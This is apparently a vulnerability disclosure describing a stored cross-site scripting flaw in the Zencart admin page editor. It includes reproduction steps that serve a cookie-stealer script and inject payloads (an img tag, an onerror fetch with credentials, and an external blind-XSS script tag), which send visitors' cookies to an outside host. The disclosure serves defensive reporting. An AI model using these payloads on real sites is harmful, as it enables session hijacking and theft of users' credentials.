Zencart | Stored XSS on Page Editor

Zencart has an interesting feature that allows administrators to change the text editor used across the website for editing pages or products and gives them two choices to choose between a “Plain text” editor and “CKEditor”.

The problem is that when you choose a plaintext editor for modifying pages, you can still inject HTML and JavaScript code which is not normal.

There is a vulnerability at [/index.php?cmd=define_pages_editor] that allows you to modify the source code of several pages. You can inject malicious code in any of these pages and execute it silently.

Reproduce

To reproduce the issue, I am going to use a PHP cookie stealer script to demonstrate how this vulnerability can be used to steal cookies.

Save the following file as capture.php:

https://gist.github.com/0xHamy/b2674eeffd1f73af96d29f152c47bcbd

Launch a PHP server to serve this file:

> php -S 0.0.0.0:1718

To reproduce this issue, login to Zencart and navigate to the following endpoint:

http://127.0.0.1/zencart/Horse-Kgc-fRizz/index.php?cmd=define_pages_editor

Select a page that you would like to modify, in my case it's going to be the define_contact_us.php page. By default your text editor should be “Plain Text” and you don't need to modify that.

Write the following payload in the input field containing source code of define_contact_us.php:

<img src='http://127.0.0.1:1718/capture.php' alt="" height="" width="">

Now, you can visit the contact endpoint:

http://127.0.0.1/zencart/index.php?main_page=contact_us

This will result in cookie theft.

The following payloads also works:

<img src="x" onerror="fetch('http://127.0.0.1:1718/capture.php', {credentials: 'include'})">
<script src=https://your-instance.bxss.in></script>